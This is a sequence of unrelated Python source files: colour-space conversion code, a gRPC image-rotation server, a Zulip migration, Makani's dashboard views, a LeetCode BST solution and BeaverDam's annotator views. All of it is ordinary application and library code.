for the *Dolby 2016* method.
- The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function, thus the domain and range values for the *Reference*
and *1* scales are only indicative that the data is not affected by
scale transformations. The effective domain of *SMPTE ST 2084:2014*
inverse electro-optical transfer function (EOTF / EOCF) is
[0.0001, 10000].
+------------+-----------------------+------------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``XYZ`` | ``UN`` | ``UN`` |
+------------+-----------------------+------------------+
+------------+-----------------------+------------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] |
| | | |
| | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] |
| | | |
| | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] |
+------------+-----------------------+------------------+
References
----------
:cite:`Dolby2016a`, :cite:`Lu2016c`
Examples
--------
>>> XYZ = np.array([0.20654008, 0.12197225, 0.05136952])
>>> XYZ_to_ICtCp(XYZ) # doctest: +ELLIPSIS
array([ 0.0685809..., -0.0028384..., 0.0602098...])
>>> XYZ_to_ICtCp(XYZ, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS
array([ 0.5924279..., -0.0374073..., 0.2512267...])
"""
BT2020 = RGB_COLOURSPACES['ITU-R BT.2020']
RGB = XYZ_to_RGB(
XYZ,
illuminant,
BT2020.whitepoint,
BT2020.matrix_XYZ_to_RGB,
chromatic_adaptation_transform,
)
return RGB_to_ICtCp(RGB, method, L_p)
def ICtCp_to_XYZ(ICtCp,
illuminant=CCS_ILLUMINANTS[
'CIE 1931 2 Degree Standard Observer']['D65'],
chromatic_adaptation_transform='CAT02',
method='Dolby 2016',
L_p=10000):
"""
Converts from :math:`IC_TC_P` colour encoding to *CIE XYZ* tristimulus
values.
Parameters
----------
ICtCp : array_like
:math:`IC_TC_P` colour encoding array.
illuminant : array_like, optional
Source illuminant chromaticity coordinates.
chromatic_adaptation_transform : unicode, optional
**{'CAT02', 'XYZ Scaling', '<NAME>', 'Bradford', 'Sharp',
'Fairchild', 'CMCCAT97', 'CMCCAT2000', 'CAT02 Brill 2008', 'CAT16',
'Bianco 2010', 'Bianco PC 2010'}**,
*Chromatic adaptation* transform.
method : unicode, optional
**{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
Computation method. *Recommendation ITU-R BT.2100* defines multiple
variants of the :math:`IC_TC_P` colour encoding:
- *ITU-R BT.2100-1*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix
from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method.
- *ITU-R BT.2100-2*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and a custom :math:`IC_TC_P`
matrix from :cite:`InternationalTelecommunicationUnion2018`:
*ITU-R BT.2100-2 HLG* method.
L_p : numeric, optional
Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
non-linear encoding. This parameter should stay at its default
:math:`10000 cd/m^2` value for practical applications. It is exposed so
that the definition can be used as a fitting function.
Returns
-------
ndarray
*CIE XYZ* tristimulus values.
Warnings
--------
The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function.
Notes
-----
- The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases
for the *Dolby 2016* method.
- The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function, thus the domain and range values for the *Reference*
and *1* scales are only indicative that the data is not affected by
scale transformations.
+------------+-----------------------+------------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] |
| | | |
| | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] |
| | | |
| | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] |
+------------+-----------------------+------------------+
+------------+-----------------------+------------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``XYZ`` | ``UN`` | ``UN`` |
+------------+-----------------------+------------------+
References
----------
:cite:`Dolby2016a`, :cite:`Lu2016c`
Examples
--------
>>> ICtCp = np.array([0.06858097, -0.00283842, 0.06020983])
>>> ICtCp_to_XYZ(ICtCp) # doctest: +ELLIPSIS
array([ 0.2065400..., 0.1219722..., 0.0513695...])
>>> ICtCp = np.array([0.59242792, -0.03740730, 0.25122675])
>>> ICtCp_to_XYZ(ICtCp, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS
array([ 0.2065400..., 0.1219722..., 0.0513695...])
"""
RGB = ICtCp_to_RGB(ICtCp, method, L_p)
BT2020 = RGB_COLOURSPACES['ITU-R BT.2020']
XYZ = RGB_to_XYZ(
RGB,
BT2020.whitepoint,
illuminant,
BT2020.matrix_RGB_to_XYZ,
chromatic_adaptation_transform,
)
return XYZ
|
function-images/image_rotate_s3/server.py
|
tom-kuchler/vhive
| 138 |
64750
|
from concurrent import futures
import logging
import os
import grpc
from PIL import Image, ImageOps
import helloworld_pb2
import helloworld_pb2_grpc
from minio import Minio
minioEnvKey = "MINIO_ADDRESS"
image_name = 'img2.jpeg'
image2_name = 'img3.jpeg'
image_path = '/pulled_' + image_name
image_path2 = '/pulled_' + image2_name
responses = ["record_response", "replay_response"]
minioAddress = os.getenv(minioEnvKey)
class Greeter(helloworld_pb2_grpc.GreeterServicer):
def SayHello(self, request, context):
if minioAddress is None:
return None
minioClient = Minio(minioAddress,
access_key='minioadmin',
secret_key='minioadmin',
secure=False)
if request.name == "record":
msg = 'Hello, %s!' % responses[0]
minioClient.fget_object('mybucket', image_name, image_path)
image = Image.open(image_path)
img = image.transpose(Image.ROTATE_90)
elif request.name == "replay":
msg = 'Hello, %s!' % responses[1]
minioClient.fget_object('mybucket', image2_name, image_path2)
image2 = Image.open(image_path2)
img = image2.transpose(Image.ROTATE_90)
else:
msg = 'Hello, %s!' % request.name
minioClient.fget_object('mybucket', image_name, image_path)
image = Image.open(image_path)
img = image.transpose(Image.ROTATE_90)
return helloworld_pb2.HelloReply(message=msg)
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))
helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)
server.add_insecure_port('[::]:50051')
server.start()
server.wait_for_termination()
if __name__ == '__main__':
logging.basicConfig()
serve()
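# Illustrative client sketch (an assumption, not part of the original file);
# it exercises the "record"/"replay" branches handled by SayHello() above and
# assumes the standard gRPC helloworld HelloRequest message:
#
#   import grpc
#   import helloworld_pb2
#   import helloworld_pb2_grpc
#
#   channel = grpc.insecure_channel("localhost:50051")
#   stub = helloworld_pb2_grpc.GreeterStub(channel)
#   print(stub.SayHello(helloworld_pb2.HelloRequest(name="record")).message)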
|
zerver/migrations/0230_rename_to_enable_stream_audible_notifications.py
|
TylerPham2000/zulip
| 17,004 |
64768
|
# Generated by Django 1.11.20 on 2019-06-12 06:41
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("zerver", "0229_stream_message_retention_days"),
]
operations = [
migrations.RenameField(
model_name="userprofile",
old_name="enable_stream_sounds",
new_name="enable_stream_audible_notifications",
),
]
|
gs/monitor2/apps/dashboard/views.py
|
leozz37/makani
| 1,178 |
64789
|
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""View functions to interact with web clients."""
import atexit
import json
import logging
import os
import re
import string
import time
from django import http
from django import shortcuts
from django import template
from django.core import urlresolvers
from makani.analysis.checks import log_util
from makani.avionics.network import message_type as aio_message_type
from makani.avionics.network import network_config
from makani.gs.monitor2.apps.layout import autogen
from makani.gs.monitor2.apps.layout import base as layout_base
from makani.gs.monitor2.apps.layout import layout_util
from makani.gs.monitor2.apps.layout import loader
from makani.gs.monitor2.apps.layout import memory as layout_memory
from makani.gs.monitor2.apps.layout import stoplights
from makani.gs.monitor2.apps.layout import widgets
from makani.gs.monitor2.apps.receiver import receiver_manager
from makani.gs.monitor2.apps.receiver import views as receiver_views
from makani.gs.monitor2.project import settings
from makani.lib.bazel import bazel_util
from makani.lib.python import c_helpers
from makani.lib.python import debug_util
from makani.lib.python import struct_tree
from makani.lib.python.h5_utils import h5_io
import numpy
MESSAGE_TYPE_HELPER = c_helpers.EnumHelper('MessageType', aio_message_type)
CONFIG_FILES = {
'plot_defs': os.path.join(settings.MONITOR_PATH, 'configs/plot_defs.json'),
}
def Home(request):
"""Get the response for the home page."""
layout_names = loader.LayoutLoader().Names()
layout_names.sort()
all_layouts = [
{'name': layout,
'url': urlresolvers.reverse(
'view_aio_layout', args=[loader.LayoutLoader().ModuleName(layout)])}
for layout in layout_names]
context = {
'layouts': all_layouts,
'canvas_cols': settings.CSS_GRID_COLUMNS,
}
_CreateAndAddClientIdToContext(context)
template_name = 'home.html'
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
def _ListFiles(path_arg):
"""List files under a local path."""
path_template = string.Template(path_arg)
prefix_path = path_template.substitute(os.environ)
sub_paths = os.listdir(prefix_path)
return prefix_path, sub_paths
def _GetFullFilePath(prefix_path, sub_path):
return os.path.join(prefix_path, sub_path)
def SelectAllLogs(request):
"""Select all logs in the last visited directory."""
current_path = request.session['current_path']
try:
prefix_path, sub_paths = _ListFiles(current_path)
except OSError:
return http.HttpResponse('Cannot list directory "%s"!' % current_path)
file_list = []
for sub_path in sorted(sub_paths):
# Construct the full path.
if sub_path.endswith('.h5') and not sub_path.startswith('format'):
full_path = _GetFullFilePath(prefix_path, sub_path)
if not os.path.isdir(full_path):
file_list.append(full_path)
return http.HttpResponse(';\n'.join(file_list))
def Console(request, command, args):
"""Take commandlines from the client and respond with console outputs.
Args:
request: The HTML resquest object.
command: The command to be run. Only 'ls' is permitted for now.
args: The string of arguments to the command.
Returns:
The HttpResponse telling the output of the command.
"""
if command != 'ls':
message = 'Command "%s" is not allowed.' % command
return http.HttpResponse(message)
arg_template = string.Template(args)
arg_path = arg_template.safe_substitute(
{'MAKANI_HOME': bazel_util.GetWorkspaceRoot()})
try:
prefix_path, sub_paths = _ListFiles(arg_path)
request.session['current_path'] = arg_path
except OSError:
return http.HttpResponse('Cannot list directory "%s"!' % arg_path)
file_list = []
for sub_path in sorted(sub_paths):
# Construct the full path.
full_path = _GetFullFilePath(prefix_path, sub_path)
if os.path.isdir(full_path):
# If this is a directory, add the javascript to allow users to click
# into it.
file_list.append(
'<a href="javascript:void(0)" onclick="onListFiles(\'%s\')">%s</a>'
% (full_path, sub_path))
elif sub_path.endswith('.h5') and not sub_path.startswith('format'):
# If this is an HDF5 file, add the javascript to allow users to
# visualize it.
file_list.append(
'<a href="javascript:void(0)" onclick="onAddLog(\'%s\')">%s</a>'
% (full_path, sub_path))
else:
file_list.append(sub_path)
text = '<br>'.join(file_list)
return http.HttpResponse(text)
def _GetMinMessageFrequency():
"""Get the minimum frequency across all message types."""
config = network_config.NetworkConfig(settings.NETWORK_YAML)
return min(m.frequency_hz for m in config.all_messages if m.frequency_hz > 0)
def _TryToEnforceAioReceiver(client_id):
"""Ensure that the client is subscribed to the AioReceiver."""
# TODO: Investigate always running the AioReceiver.
message_receiver = receiver_manager.ReceiverManager.GetReceiver(client_id)
if not message_receiver:
if receiver_manager.ReceiverManager.CheckAndStartAioReceiver(
client_id, receiver_views.CreateAioReceiver):
# A new AioReceiver is started.
# Get the longest period for all messages, and multiply it by two to
# make sure we do not miss any message.
time.sleep(2.0 / _GetMinMessageFrequency())
return receiver_manager.ReceiverManager.GetReceiver(client_id)
else:
return message_receiver
def ViewMessageType(request, client_id, message_type,
template_name='monitor.html'):
"""View information within a message by automatically generating a layout.
Args:
request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
message_type: The Enum name of a message type.
template_name: The HTML template used to render the layout.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
configs = _LoadConfigs()
_TryToEnforceAioReceiver(client_id)
resp = _GetMessage(request, client_id, message_type)
resp = resp.Data(convert_to_basic_types=True) if resp else {}
configs['scenarios'] = autogen.GenerateScenario(resp, message_type)
context = _PrepareContext(configs)
new_client_id = _CreateAndAddClientIdToContext(context)
context['periodic_url'] = '/dashboard/periodic/msg_enum/%s/%s' % (
new_client_id, message_type)
context['content_width'] = settings.CSS_GRID_COLUMNS
context['order_horizontally'] = True
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
def UpdateMessageOptions(unused_request, client_id):
"""Detect what messages have been received and update the client.
Args:
unused_request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
Returns:
An HttpResponse about a dictionary of {message_enum: message_short_name}
"""
message_receiver = _TryToEnforceAioReceiver(client_id)
info = message_receiver.GetReceivedMessageTypes() if message_receiver else []
return http.HttpResponse(json.dumps(info))
def ViewAioLayout(request, layout_name):
"""Open a monitor layout that get data from AIO.
Args:
request: An HttpRequest from the client.
layout_name: Name of the layout associated with the client.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
context = {'receiver_type': 'aio'}
return _ViewLayout(request, layout_name, context)
def BrowseLog(request, path):
"""Browse the log by expanding the field at `path`.
Args:
request: An HttpRequest from the client.
path: A path pointing to one field in the log.
Returns:
An HttpResponse serializing a list of names for child fields.
"""
# The log structure may differ across logs, we always use the first log to
# construct the log structure.
log_path = request.session['log_paths'][0]
log_data = struct_tree.StructTree(log_path, fail_silently=True, readonly=True)
try:
skeleton = log_data.Skeleton(path, depth=1)
except h5_io.H5IndexError:
return http.HttpResponse('{}')
parent_path = path
d3_data = struct_tree.DictToD3Tree(skeleton, '.', parent_path)
if 'children' in d3_data:
# The first layer is a placeholder. Starts from the second layer.
return http.HttpResponse(json.dumps(d3_data['children']))
else:
return http.HttpResponse('{}')
def ViewLogStructure(request, paths, template_name='log_structure.html'):
"""View structure of an HDF5 log at given log path.
Args:
request: An HttpRequest from the client.
paths: Paths to the local log files.
template_name: The HTML template used to render the layout.
Returns:
An HttpResponse that renders the log structure.
"""
# `context` includes variables used to render the HTML.
context = {
'graph_width': 6000,
'graph_height': 6000,
'frame_width': 200,
'frame_height': 540,
'canvas_cols': 12,
}
log_paths = []
for path in paths.split(';'):
path = path.strip()
if not path:
continue
path_template = string.Template(path)
log_path = path_template.substitute(os.environ)
basename = os.path.basename(log_path)
if basename.startswith('(') and basename.endswith(')'):
dirname = os.path.dirname(log_path)
regex_pattern = re.compile(basename[1:-1]+'$')
filenames = os.listdir(dirname)
matched_files = [f for f in filenames if regex_pattern.match(f)]
log_paths += [os.path.join(dirname, f) for f in matched_files]
else:
log_paths.append(log_path)
if not log_paths:
context['errors'] = 'Cannot find log data'
else:
# Use the first log to index fields.
log_data = struct_tree.StructTree(
log_paths[0], fail_silently=True, readonly=True)
log_skeleton = log_data.Skeleton(depth=1)
d3_data = struct_tree.DictToD3Tree(log_skeleton, '/')
d3_data['expand_url'] = urlresolvers.reverse('browse_log', args=[''])
request.session['log_paths'] = log_paths
context['skeleton'] = json.dumps(d3_data)
order_horizontally = True
configs = _LoadConfigs()
scenarios = layout_base.AssembleLayout([
('Signals', [
widgets.DictLinesWidget('series', None, interactive=True,
use_markers=True),
]),
], desired_view_cols=1, order_horizontally=order_horizontally)
layout_names = loader.LayoutLoader().ModuleNames()
layout_names.sort()
configs['scenarios'] = scenarios
context.update(_PrepareContext(configs))
context['layout_names'] = layout_names
context['content_width'] = settings.CSS_GRID_COLUMNS - 2
context['order_horizontally'] = order_horizontally
_CreateAndAddClientIdToContext(context)
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
def PeriodicDataPoll(request, client_id, layout_name):
"""Compute realtime data and respond to periodic polling from a client layout.
Args:
request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
layout_name: Name of the layout associated with the client.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
aggregated_message = _GetMessage(request, client_id)
if not aggregated_message:
aggregated_message = struct_tree.StructTree(
{}, fail_silently=True, readonly=True)
layout = loader.LayoutLoader().GetLayoutByModuleName(layout_name)
tab_memory = layout_memory.GetMemory(client_id, False)
if tab_memory is not None:
# Load the persistent memory.
layout.Import(tab_memory)
else:
layout.Initialize()
tab_memory = layout_memory.GetMemory(client_id, True)
# Start the AIO receiver in case the server has restarted.
_TryToEnforceAioReceiver(client_id)
try:
data = layout.Filter(aggregated_message)
except Exception: # pylint: disable=broad-except
    # layout.Filter may raise any kind of exception.
logging.error('PeriodicDataPoll encountered an error:\n%s',
debug_util.FormatTraceback())
layout.Export(tab_memory)
return http.HttpResponse('{}')
# Save the persistent memory.
layout.Export(tab_memory)
resp = data.Json()
if settings.DEBUG:
resp['__message__'] = '\n-----------------------------\n'.join(
'Error in indicator "%s":\n%s' % (k, v)
for k, v in layout.ErrorReport())
resp_str = json.dumps(resp)
layout.ClearErrors()
return http.HttpResponse(resp_str)
def _DownSample(data, length):
window_size = max(1, len(data)/length)
if window_size > 1:
data = data[:len(data) / window_size * window_size]
return numpy.mean(data.reshape(-1, window_size), 1), window_size
else:
return data, 1
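# Hedged example (illustration only): _DownSample averages non-overlapping
# windows so the output has roughly `length` points and reports the window
# size it used, e.g. with 12 samples and a target length of 4:
#
#   values, rate = _DownSample(numpy.arange(12.0), 4)
#   # window_size == 12 / 4 == 3, values == [1.0, 4.0, 7.0, 10.0], rate == 3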
def GetLogData(request, mode, fields):
"""Get values of data fields within a log file."""
log_paths = request.session['log_paths']
fields = [f.strip() for f in fields.split('\n') if f.strip()]
field_labels = layout_util.GetDistinguishableNames(
fields, '.', ['kAioNode', 'kMessageType'])
if mode == 'merge':
series = ConcatenateLogData(log_paths, field_labels)
else: # By default, mode = 'compare'
series = CompareLogData(log_paths, field_labels)
resp = {'series': series}
return http.HttpResponse(json.dumps(resp))
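# Hedged note (illustration only): mode 'merge' concatenates each field across
# all selected logs into a single series per field, while the default
# 'compare' mode keeps one series per (log, field) pair so the same field can
# be overlaid across logs.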
def _StringReplace(subject, translate):
for s, t in translate:
subject = subject.replace(s, t)
return subject
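# Hedged example (illustration only), using the `replacement` list built in
# GetRawLogData below:
#
#   _StringReplace('motor.status[2]', replacement)  # -> 'motor_status_2_'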
def GetMessageSnapshot(request, client_id, title):
aggregated_message = _GetMessage(request, client_id)
result = aggregated_message.Data(True)
response = http.HttpResponse(content_type='text/plain')
response['Content-Disposition'] = (
'attachment; filename=snapshot_%s.json' % title)
response.write(json.dumps(result, indent=2))
return response
def GetRawLogData(request, fields):
"""Get values of data fields within a log file."""
log_paths = request.session['log_paths']
fields = [f.strip() for f in fields.split('\n') if f.strip()]
field_labels = layout_util.GetDistinguishableNames(
fields, '.', ['kAioNode', 'kMessageType'])
result = {}
# Remove special characters so variables can be parsed and loaded into Matlab.
bad_chars = ['.', ',', '-', '+', '(', ')', '[', ']', '{', '}', ':',
'kMessageType', 'kAioNode', 'messages', 'message']
replacement = list(zip(bad_chars, ['_'] * len(bad_chars)))
replacement = [('[:]', ''), (':,', ''), (' ', '')] + replacement
for log_path in log_paths:
base_name = os.path.basename(log_path)
log_name = 'log_' + _StringReplace(base_name[:base_name.find('.')],
replacement)
log_data = struct_tree.StructTree(
log_path, fail_silently=True, readonly=True)
result[log_name] = {}
for field, legend_label in field_labels.iteritems():
data, timestamps = log_util.GetOrderedDedupDataAndTimeByField(
log_data, field, rebase=False)
result[log_name][_StringReplace(legend_label, replacement)] = {
'values': data.tolist() if data is not None else None,
'timestamps': timestamps.tolist() if timestamps is not None else None,
'status': 'success' if data is not None else 'missing',
}
response = http.HttpResponse(content_type='text/plain')
response['Content-Disposition'] = 'attachment; filename=makani_log_data.json'
response.write(json.dumps(result, indent=2))
return response
def ConcatenateLogData(log_paths, field_labels):
"""Get series of data, each corresponding to field values in all logs."""
series = {}
base_timeline = float('inf')
for log_path in log_paths:
log_data = struct_tree.StructTree(
log_path, fail_silently=True, readonly=True)
for field, legend_label in field_labels.iteritems():
data, timestamps = log_util.GetOrderedDedupDataAndTimeByField(
log_data, field, rebase=False)
if data is None or timestamps is None:
continue
base_timeline = min(base_timeline, float(timestamps[0]))
if legend_label not in series:
series[legend_label] = {'x': timestamps, 'y': data}
else:
series[legend_label]['x'] = numpy.concatenate(
(series[legend_label]['x'], timestamps))
series[legend_label]['y'] = numpy.concatenate(
(series[legend_label]['y'], data))
result = {}
for field, legend_label in field_labels.iteritems():
timestamps, _ = _DownSample(
series[legend_label]['x'], settings.MAX_DATA_POINTS_PER_LOG_FIELD)
data, downsample_rate = _DownSample(
series[legend_label]['y'], settings.MAX_DATA_POINTS_PER_LOG_FIELD)
if downsample_rate > 1:
legend_label += '(/%d)' % downsample_rate
result[legend_label] = {'x': (timestamps - base_timeline).tolist(),
'y': data.tolist()}
return result
def CompareLogData(log_paths, field_labels):
"""Get series of data, each corresponding to field values within a log."""
series = {}
base_timeline = float('inf')
for log_path in log_paths:
log_data = struct_tree.StructTree(
log_path, fail_silently=True, readonly=True)
log_name = os.path.basename(log_path)
if '.' in log_name:
log_name = log_name[:log_name.rfind('.')]
for field, legend_label in field_labels.iteritems():
data, timestamps = log_util.GetOrderedDedupDataAndTimeByField(
log_data, field, rebase=True)
if data is None or timestamps is None:
continue
data, _ = _DownSample(data, settings.MAX_DATA_POINTS_PER_LOG_FIELD)
timestamps, downsample_rate = _DownSample(
timestamps, settings.MAX_DATA_POINTS_PER_LOG_FIELD)
base_timeline = min(base_timeline, float(timestamps[0]))
short_name = '%s.%s' % (log_name, legend_label)
if downsample_rate > 1:
short_name += '(/%d)' % downsample_rate
series[short_name] = {'x': timestamps,
'y': data.tolist()}
for short_name in series:
series[short_name]['x'] = (series[short_name]['x'] - base_timeline).tolist()
return series
def PeriodicMessagePoll(request, client_id, message_type=None):
"""Retrieve realtime data and respond to periodic polling from a message view.
Args:
request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
message_type: The Enum name of a message type.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
resp = _GetMessage(request, client_id, message_type)
if not resp:
resp = {}
else:
resp = resp.Data(convert_to_basic_types=True)
resp_str = json.dumps(resp)
return http.HttpResponse(resp_str)
def _LoadConfigs():
"""Load default layout configuration parameters."""
configs = {}
for cf, filename in CONFIG_FILES.iteritems():
with open(filename, 'r') as fp:
configs[cf] = json.load(fp)
if 'plot_defs' not in configs:
    logging.error('Missing definitions for plotting javascripts.')
return configs
def _PrepareContext(configs):
"""Prepare the context to render the layout."""
context = {}
fig_templates = set()
canvas_cols = configs['scenarios']['canvas']['grid_width']
context['canvas_cols'] = canvas_cols
row_height_px = configs['scenarios']['canvas']['row_height_px']
ui_objs = []
max_cols = canvas_cols
for stripe in configs['scenarios']['views']:
for view in stripe['stripe']:
view['canvas_cols'] = int(
float(view['grid_width']) / stripe['grid_width'] * canvas_cols + 0.5)
for indicator in view['indicators']:
ui_obj = indicator
if 'rows' not in ui_obj:
ui_obj['height'] = 'auto'
else:
rows = ui_obj['rows']
ui_obj['height'] = str(rows * row_height_px) + 'px'
if 'cols' not in ui_obj:
ui_obj['cols'] = max_cols
# TODO: Change `id` to 'indicator_id', and 'selector'
# to 'dom_selector'.
ui_obj['id'] = 'ui_obj_%s' % len(ui_objs)
ui_obj['selector'] = '#%s' % (ui_obj['id'])
ui_objs.append(ui_obj)
fig_templates.add(ui_obj['template'])
context['fig_templates'] = fig_templates
context['plot_defs'] = configs['plot_defs']
context['views'] = configs['scenarios']['views']
context['ui_objs_str'] = json.dumps(ui_objs)
context['stoplight_error'] = stoplights.STOPLIGHT_ERROR
context['stoplight_warning'] = stoplights.STOPLIGHT_WARNING
context['stoplight_normal'] = stoplights.STOPLIGHT_NORMAL
context['stoplight_unavailable'] = stoplights.STOPLIGHT_UNAVAILABLE
context['stoplight_any'] = stoplights.STOPLIGHT_ANY
return context
def _GetMessage(unused_request, client_id, message_type=None):
"""Get a message from the receiver."""
message_receiver = receiver_manager.ReceiverManager.GetReceiver(client_id)
resp = struct_tree.StructTree({}, fail_silently=True, readonly=True)
if message_receiver:
if message_type is not None:
message_enum = MESSAGE_TYPE_HELPER.Value(message_type)
else:
message_enum = None
resp = message_receiver.GetLatest(message_enum)
return resp
def _CreateAndAddClientIdToContext(context):
client_id = receiver_manager.ReceiverManager.GetNewClientId()
context['client_id'] = client_id
return client_id
def _ViewLayout(request, layout_name, extra_context=None):
"""Get a monitor layout according to `layout_name`."""
layout = loader.LayoutLoader().GetLayoutByModuleName(layout_name)
if layout is None:
return http.HttpResponseRedirect(urlresolvers.reverse('home'))
layout.Initialize()
configs = _LoadConfigs()
configs['scenarios'] = layout.Scenario()
context = _PrepareContext(configs)
client_id = _CreateAndAddClientIdToContext(context)
# Initialize the layout.
layout.Export(layout_memory.GetMemory(client_id, True))
# Add polling URL.
context['periodic_url'] = '/dashboard/periodic/layout/%s/%s' % (client_id,
layout_name)
context['layout_name'] = layout_name
context['content_width'] = settings.CSS_GRID_COLUMNS
context['order_horizontally'] = layout.OrderHorizontally()
context['default_font_size'] = layout.DefaultFontSize()
context['sim_mode'] = settings.POPULATE_MESSAGES_FROM_SIM
if extra_context:
context.update(extra_context)
template_name = 'monitor.html'
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
|
questions/increasing-order-search-tree/Solution.py
|
marcus-aurelianus/leetcode-solutions
| 141 |
64797
|
<filename>questions/increasing-order-search-tree/Solution.py
"""
Given the root of a binary search tree, rearrange the tree in in-order so that the leftmost node in the tree is now the root of the tree, and every node has no left child and only one right child.
Example 1:
Input: root = [5,3,6,2,4,null,8,1,null,null,null,7,9]
Output: [1,null,2,null,3,null,4,null,5,null,6,null,7,null,8,null,9]
Example 2:
Input: root = [5,1,7]
Output: [1,null,5,null,7]
Constraints:
The number of nodes in the given tree will be in the range [1, 100].
0 <= Node.val <= 1000
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def increasingBST(self, root: TreeNode) -> TreeNode:
def inorder(root, arr):
if root is None:
return
inorder(root.left, arr)
arr.append(root.val)
inorder(root.right, arr)
arr = []
inorder(root, arr)
ps = []
for i, val in enumerate(arr):
c = TreeNode(val)
if i > 0:
ps[-1].right = c
ps.append(c)
return ps[0]
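# Hedged usage sketch (illustration only; LeetCode injects TreeNode, so this
# file is not runnable standalone):
#
#   root = TreeNode(5, TreeNode(3, TreeNode(2), TreeNode(4)),
#                   TreeNode(6, None, TreeNode(8)))
#   head = Solution().increasingBST(root)
#   # following head.right repeatedly visits 2, 3, 4, 5, 6, 8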
|
annotator/views.py
|
ljames1/BeaverDam
| 201 |
64815
|
<gh_stars>100-1000
from django.shortcuts import render, redirect
from django.conf import settings
from django.http import HttpResponse, Http404, HttpResponseBadRequest, HttpResponseForbidden
from django.views.generic import View
from django.views.decorators.clickjacking import xframe_options_exempt
from django.contrib.admin.views.decorators import staff_member_required
from django.core.exceptions import ObjectDoesNotExist
from mturk.queries import get_active_video_turk_task
from .models import *
from mturk.models import Task, FullVideoTask, SingleFrameTask
from .services import *
from datetime import datetime, timezone
import os
import json
import urllib.request
import urllib.parse
import markdown
import sys
import mturk.utils
import logging
import ast
logger = logging.getLogger()
def home(request):
need_annotating = Video.objects.filter(id__gt=0, verified=False)
return render(request, 'video_list.html', context={
'videos': need_annotating,
'thumbnail': True,
'test': settings.AWS_ID,
'title': 'Videos'
})
def verify_list(request):
need_verification = Video.objects.filter(id__gt=0, verified=False).exclude(annotation='')[:250]
return render(request, 'video_list.html', context={
'videos': need_verification,
'title': 'Videos to Verify'
})
def verified_list(request):
verified = Video.objects.filter(id__gt=0, verified=True).exclude(annotation='')[:100]
return render(request, 'video_list.html', context={
'videos': verified,
'title': 'Verified Videos'
})
def ready_to_pay(request):
#tasks = FullVideoTask.objects.filter(paid = False, video__verified = True).exclude(hit_id = '')
tasks = FullVideoTask.objects.all()#filter(paid = False, video__verified = True).exclude(hit_id = '')
print("there are {} tasks".format(len(tasks)))
return render(request, 'turk_ready_to_pay.html', context={
'tasks': tasks,
})
def next_unannotated(request, video_id):
id = Video.objects.filter(id__gt=video_id, annotation='')[0].id
return redirect('video', id)
# status of Not Published, Published, Awaiting Approval, Verified
# this is a bit convoluted as there's status stored on
# video (approved) as well as FullVideoTask (closed, paid, etc.)
def get_mturk_status(video, full_video_task):
    if video.verified:
        return "Verified"
    if full_video_task is None:
        if video.rejected:
            return "Rejected"
        elif video.annotation == '':
            return "Not Published"
        else:
            return "Awaiting Approval"
    if full_video_task.worker_id == '':
        return "Published"
    return "Awaiting Approval"
@xframe_options_exempt
def video(request, video_id):
try:
video = Video.objects.get(id=video_id)
labels = Label.objects.all()
except Video.DoesNotExist:
raise Http404('No video with id "{}". Possible fixes: \n1) Download an up to date DB, see README. \n2) Add this video to the DB via /admin'.format(video_id))
mturk_data = mturk.utils.authenticate_hit(request)
